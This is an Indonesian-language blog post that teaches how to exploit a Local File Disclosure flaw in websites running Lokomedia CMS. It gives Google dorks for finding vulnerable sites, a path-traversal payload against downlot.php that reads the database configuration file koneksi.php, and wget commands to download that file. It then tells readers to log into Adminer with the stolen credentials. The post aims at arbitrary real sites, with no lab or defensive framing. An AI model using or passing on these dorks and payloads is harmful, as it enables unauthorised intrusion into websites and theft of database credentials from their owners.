Pada kesempatan kali ini, gewe akan share tutorial exploitasi celah Local File Disclosure pada web ber-cms Lokomedia.
Karna Local File Disclosure, adalah celah yang sangat fatal, dan sangat berbahaya buat para develover.
Tapi pada kali ini gewe akan share cara exploitasi celah LFD, untuk memulai tutorial kali ini silahkan ikutin saja.
1. Dorking ke google menggunakan dork di bawah ini.
Inurl:/downlot.php
Inurl:/downloat.php ext:pdf2. Setelah menemukan situs, yang memiliki file downlot.php, lalu masukkan exploit berikut ini.
downlot.php?file=../config/koneksi.phpContoh pasang Exploit
http://website.com/downloat.php?file=../conifg/koneksi.php3. Agar lebih mudah dalam mendownload file, silahkan kalian masukkan command berikut ini ke CMD atau Terminal, tapi kalian harus menginstall paket Wget terlebih dahulu.
$ pkg install wget
$ wget http://website.com/downlot.php?file=../config/koneksi.php
Dan dengan begitu, file configiration dari sebuah website bisa terunduh, selanjutnya silahkan ada login ke adminer menggunakan User&password yang ada di file tersebut.
Terima kasih telah berkunjung ke blog sederhana ini, Jangan kemana-mana kami akan selalu update dengan exploit terbaru.
Muhamm Sona | LinuxCrews
comment 0 comments:
more_vertsentiment_satisfied Emoticon